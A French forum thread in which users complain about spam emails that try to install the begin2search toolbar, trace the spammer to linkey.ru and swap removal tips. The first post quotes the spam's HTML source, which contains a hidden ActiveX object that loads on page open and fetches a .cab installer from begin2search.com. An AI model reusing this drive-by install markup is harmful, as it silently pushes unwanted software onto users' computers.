|
|
|
|
Bonjour à tous,
j'ai reçu une dizaine de mails essayant de m'installer la toolbar, çà devient pénible !!
Sur le net, www.begin2search.com est même appelé virus...
<html>
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
1252">
<script language=3D"javascript">
function popTool() {
OO.innerHTML =3D '<OBJECT ID=3D"Inst" CLASSID=3D"CLSID:07E9CDF4-20D2-46B1-=
B681-663968F527CE" codebase=3D"http://www.begin2search.com/toolbar/bar/win=
b2s32.cab#Version=3D2,6,0,0" width=3D0 height=3D0><PARAM NAME=3D"ID" VALUE=
=3D"582562"> <PARAM NAME=3D"CAT" VALUE=3D"7"></OBJECT>';
}
</script>
</head>
<body onload=3D"popTool();">
<div id=3DOO></div>
<p align=3D"center">
<p><a href=3D"http://www.begin2search.net/now.php"><b>
<font face=3D"Microsoft Sans Serif" size=3D"8">toronto canada</font></a>
</b></p>
<br>
<font color=3D"#FFFFFF">wrestling mexico vacation jewelry</font></a></p>
<OBJECT ID=3D"Inst" CLASSID=3D"CLSID:07E9CDF4-20D2-46B1-B681-663968F527CE"=
codebase=3D"http://www.begin2search.com/toolbar/bar/winb2s32.cab#Version=3D=
2,6,0,0" width=3D0 height=3D0><PARAM NAME=3D"ID" VALUE=3D"582562"> <PARAM =
NAME=3D"CAT" VALUE=3D"7"></OBJECT>
</body>
</html>J'ai McAfee, ZoneAlarm à jours, updates à jour, etc...
Merci à tous pour les conseils.
"les paramêtres de sécurité actuels ne vous permettent pas d'exécuter les contrôles ActiveX de cette page. En conséquence, cette page ne sera peut-être pas affichée correctement"Je n'ai pas non plus la clé désignée dans ma BDR et je n'ai aucune trace de leur fichier winb2s32.cab qu'ils essaient de faire de télécharger dans "Temporary Internet Files"... ~~~~~ Eh oui, l'informatique n'est ~~~~~ ~~~ qu'une suite de problèmes... ;-) ~~~ |
Salut as tous
|
Salut Franco,
213.159.109.103 (109.103.linkey.ru) est le spammeur (IN) : Cette IP n'est pas blacklistee (5 spam(s) direct(s)). 213.159.109.103 --> 109.103.linkey.ru --> 213.159.109.103 109.103.linkey.ru est validé Abuse.net donne : abuse@linkey.ru postmaster@linkey.ru support@linkey.ruJ'ai visité leur site www.begin2search.com en passant par le proxy anonymizer... belle boite américaine, qui prétend vendre des solutions anti-spyware et autres ... foutage de gueule !!! Dans le cas présent, la CNIL ne peut rien faire, et ils conseillent de signaler à http://www.ftc.gov/bcp/conline/edcams/spam/index.html Tiens, si j'habitais aux USA, je leur collerais un procès. Et que prévoit la LCEN pour çà ????? rien... "reçois les virus et ferme-la..." :-(( ~~~~~ Eh oui, l'informatique n'est ~~~~~ ~~~ qu'une suite de problèmes... ;-) ~~~ |
Salut a tous
|
Salut telecharge :
|
Les crapules à l'origine de ce merdier sont des russes de la société Linkey.ru basée à saint petersbourg et dont les serveurs sont hostés à san jose en californie.
|
Salut telecharge c anti spywares
|
Salut
|
J ai reussi a enlevere cette merde grace a ca
|